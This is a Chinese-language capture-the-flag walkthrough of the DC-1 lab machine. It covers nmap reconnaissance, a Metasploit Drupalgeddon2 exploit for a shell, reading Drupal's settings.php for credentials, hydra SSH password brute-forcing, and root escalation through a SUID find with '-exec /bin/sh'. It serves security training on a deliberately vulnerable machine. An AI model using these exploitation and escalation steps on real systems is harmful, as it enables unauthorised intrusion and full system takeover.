DC-1

2020-03-17

信息收集

PORT    STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Debian))
111/tcp open rpcbind 2-4 (RPC #100000)

################## ALL Port ###########################3
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0) 
| ssh-hostkey:
| 1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
| 2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA) 
|_ 256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Debian)) |_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
|/themes//CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
|/INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Welcome to Drupal Site | Drupal Site
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
...
35460/tcp open status 1 (RPC #100024)

web 目录枚举

############# /robots.txt ################ #
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where not to go on your site,
# you save bandwidth and server resources.
#
# This file will be ignored unless it is at the root of your host:
# Used:
# Ignored: #
# For more
# http://www.robotstxt.org/wc/robots.html #
# For syntax checking, see:
# http://www.sxw.org.uk/computing/robots/check.html
User-agent: *
Crawl-delay: 10
# Directories
Disallow: /includes/ 
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/ 
Disallow: /scripts/
Disallow: /themes/
# Files
Disallow: /CHANGELOG.txt 
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt 
Disallow: /INSTALL.pgsql.txt 
Disallow: /INSTALL.sqlite.txt 
Disallow: /install.php 
Disallow: /INSTALL.txt 
Disallow: /LICENSE.txt 
Disallow: /MAINTAINERS.txt
Disallow: /update.php 
Disallow: /UPGRADE.txt 
Disallow: /xmlrpc.php
# Paths (clean URLs) 
Disallow: /admin/ 
Disallow: /comment/reply/ 
Disallow: /filter/tips/ 
Disallow: /node/add/ 
Disallow: /search/ 
Disallow: /user/register/ 
Disallow: /user/password/ 
Disallow: /user/login/ 
Disallow: /user/logout/
# Paths (no clean URLs)
Disallow: /?q=admin/ 
Disallow: /?q=comment/reply/ 
Disallow: /?q=filter/tips/ 
Disallow: /?q=node/add/ 
Disallow: /?q=search/ 
Disallow: /?q=user/password/ 
Disallow: /?q=user/register/ 
Disallow: /?q=user/login/ 
Disallow: /?q=user/logout/

逐一访问，得到如下信息：

• CMS：Drupal
• 版本：7.X

漏洞利用(Getshell)

搜索历史漏洞，找一个可正常利用的，有的会因为各种问题无法使用

在 MSF 上搜到几个，挑个利用：

use exploit/unix/webapp/drupal_drupalgeddon2

信息收集

• 登陆用户：www-data
• Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686 GNU/Linux
• /etc/passwd
  • flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash

flag

查看当前目录，得到一个 flag， flag4用户下得到第二个 flag

flag1 提示找 Drupal 的配置文件，百度一下 Drupal 的配置文件一般位于 /var/www/sites/default/

文件名是 settings.php

find 一下：

find / -type f -name settings.php 2>/dev/null 
/var/www/sites/default/settings.php

查看后得到 flag2 和一组用户名密码，登陆数据库得到两个用户名(第三个是我自己加的)，密码被加密，暂时没有作用

密码枚举

flag2 提到了密码爆破不是唯一的方法，可能是通过修改数据库内某个用户的密码，不想这么麻烦

听歌的时候想到了还有个 flag4 用户，既然存在，那肯定有其道理，试试能不能枚举
hydra 爆破 ssh，因为刚装的系统，密码字典还没下载，就先用 john 的，还真得到了密码

登陆

登录 ssh，查看 SUID ，find 提权

/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find	# <---
/usr/sbin/exim4
/usr/lib/pt_chown 
/usr/lib/openssh/ssh-keysign 
/usr/lib/eject/dmcrypt-get-device 
/usr/lib/dbus-1.0/dbus-daemon-launch-helper 
/sbin/mount.nfs

提权

flag4@DC-1:~$ find ./ -type f -name flag4.txt -exec "whoami" \; 
root

flag4@DC-1:~$ find ./ -type f -name flag4.txt -exec "/bin/sh" \;
# cd /root
# cat thefinalflag.txt

都提权了，其他 flag 也就无所谓了

flag
flag2
flag4
thefinalflag.txt